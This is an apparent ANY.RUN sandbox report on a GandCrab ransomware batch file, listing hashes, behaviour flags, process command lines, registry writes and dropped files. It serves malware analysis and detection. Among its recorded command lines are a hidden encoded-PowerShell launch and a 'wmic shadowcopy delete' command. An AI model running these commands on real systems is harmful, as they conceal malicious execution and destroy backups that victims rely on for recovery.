General Info

File name

mal_ran.bat

Full analysis
https://app.any.run/tasks/77457807-e511-4741-aac8-f983f0f76de9
Verdict
Malicious activity
Analysis date
11/8/2018, 09:28:40
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

ransomware

gandcrab

Indicators:

MIME:
text/plain
File info:
ASCII text, with very long lines, with no line terminators
MD5

420ce5db06ffe3ac5f813ee99db80caf

SHA1

964702358f8dbbd2e19b0791b4b5fb8de35b1df0

SHA256

69571096d40a65abef7ef4bf0a28f01e67449754aa9018a943922179891a825d

SSDEEP

24:I4kJQ1MZfar5aecVZxMAPA9Fn2Ghf9vjVqG7EvnN/fiAS25inr:EQ1MZOfcfxMrnlpXp7EvN/ZSv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
240 seconds
Additional time used
180 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Renames files like Ransomware
  • powershell.exe (PID: 1684)
Executes PowerShell scripts
  • cmd.exe (PID: 3708)
GandCrab keys found
  • powershell.exe (PID: 1684)
Writes file to Word startup folder
  • powershell.exe (PID: 1684)
Dropped file may contain instructions of ransomware
  • powershell.exe (PID: 1684)
Connects to CnC server
  • powershell.exe (PID: 1684)
Deletes shadow copies
  • powershell.exe (PID: 1684)
Actions looks like stealing of personal data
  • powershell.exe (PID: 1684)
Creates files like Ransomware instruction
  • powershell.exe (PID: 1684)
Creates files in the user directory
  • notepad++.exe (PID: 3968)
  • powershell.exe (PID: 1684)
Reads Internet Cache Settings
  • powershell.exe (PID: 1684)
Reads settings of System Certificates
  • powershell.exe (PID: 1684)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 1684)

Processes

Total processes
46
Monitored processes
7
Malicious processes
2
Suspicious processes
0

Behavior graph

Processes in graph (from start): cmd.exe (no specs), cmd.exe (no specs), notepad++.exe, gup.exe, cmd.exe (no specs), powershell.exe (#GANDCRAB), wmic.exe (no specs)

Process information

PID
3360
CMD
cmd /c ""C:\Users\admin\Desktop\mal_ran.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
2328
CMD
cmd /c ""C:\Users\admin\Desktop\mal_ran.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3968
CMD
"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\mal_ran.bat"
Path
C:\Program Files\Notepad++\notepad++.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Don HO [email protected]
Description
Notepad++ : a free (GNU) source code editor
Version
7.51
Modules
Image
c:\program files\notepad++\notepad++.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\program files\notepad++\scilexer.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll
c:\program files\notepad++\updater\gup.exe
c:\windows\system32\windowscodecs.dll
c:\program files\notepad++\plugins\mimetools.dll
c:\program files\notepad++\plugins\nppconverter.dll
c:\program files\notepad++\plugins\nppexport.dll

PID
3116
CMD
"C:\Program Files\Notepad++\updater\gup.exe" -v7.51
Path
C:\Program Files\Notepad++\updater\gup.exe
Indicators
Parent process
notepad++.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Don HO [email protected]
Description
GUP : a free (LGPL) Generic Updater
Version
4.1
Modules
Image
c:\program files\notepad++\updater\gup.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\notepad++\updater\libcurl.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\normaliz.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cryptbase.dll

PID
3708
CMD
"C:\Windows\system32\cmd.exe"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1684
CMD
powershell.exe -nop -w hidden -e
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll

PID
3804
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

Registry activity

Total events
447
Read events
347
Write events
100
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3968
notepad++.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3968
notepad++.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3968
notepad++.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1684
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\ex_data\data
ext
2E006D007900780074006C00680073000000
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
public
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
private
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings

Files activity

Executable files
0
Suspicious files
284
Text files
217
Unknown types
11

Dropped files

PID
Process
Filename
Type
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 406d10f5c827ea36a9b0742142920e72
SHA256: 8ba09ebe1cc1b8a836427d11f9f2b2d65343665ddb4b6be2ab26d744a2b88d6b
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 8198045766233563078130897913e5ac
SHA256: 3c16c48233055748ab3f7b880c827b356f5ea370b837ad08fd29f50fdaa4df34
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2dd5634824f38092cfcf9868bab6213c
SHA256: eb289aa0ac192ba0249f3111cb5ca26fc1d73fa00961dea6e5b8920cf3b56fcc
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 59b644a561545c8031ba64e76a00ac3d
SHA256: 54ba2ff689f71bd8508b0e9a3f2bd484f4de7ac8ff1b5ee8f0972de6c58434bb
1684
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: f7f2f00b494e5743e5ff6f09be9f01b8
SHA256: 270dc1612de6fd5c6316d4afbd9941ab87aa32683677ed0bcb691c08d4b05821
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar978F.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab978E.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
compressed
MD5: 2af3e4b57a8b637fcee8cb7485986fa3
SHA256: 10632f5e8df34d4641f11aa0ad917a629bf75f7c0eaa77506c5a27919e7b12aa
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab96B1.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar96B2.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Tar9681.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Local\Temp\Cab9680.tmp
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 323c3ede3e8ade45f5d776ac3a936d36
SHA256: c63a32da3b955a572a76f1a617ce5c063a3db9139629268c6481e3a4925c4013
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: f132b6df535d5aa9d6b0c4684c9d4a02
SHA256: cf6be448ddd4e3f7b6a3837044117b35d3cdcaac25b11be35a5271eb59d52906
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.myxtlhs
binary
MD5: f61d7027a3cc48d6ed5d3b84828b3a90
SHA256: ad462f775652aba01373d66b000f07fd767759b24d1117daf1307db9c73011e8
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css.myxtlhs
binary
MD5: 2f62e56059e9da3d371a0e0dac9415ed
SHA256: 7070b0277c8959434ddec1c94c827dc00cb1e6acf1091b104d8f9f04529f283a
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.myxtlhs
binary
MD5: 69b2ce955d36d81c4fb08e6029eb2654
SHA256: c50b777959f6fa2664943437e078298383b2e4fe7583b4e8547920d612e9e460
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.myxtlhs
binary
MD5: e455079874564474166ed6e1793947f9
SHA256: bffba43eb7097cce0eb979aa1787686d225feef1db0dca1d2282b4c64538e2e1
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css
––
MD5:  ––
SHA256:  ––
1684
powershell.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\disabletables.css
––
MD5:  ––
SHA256:  ––
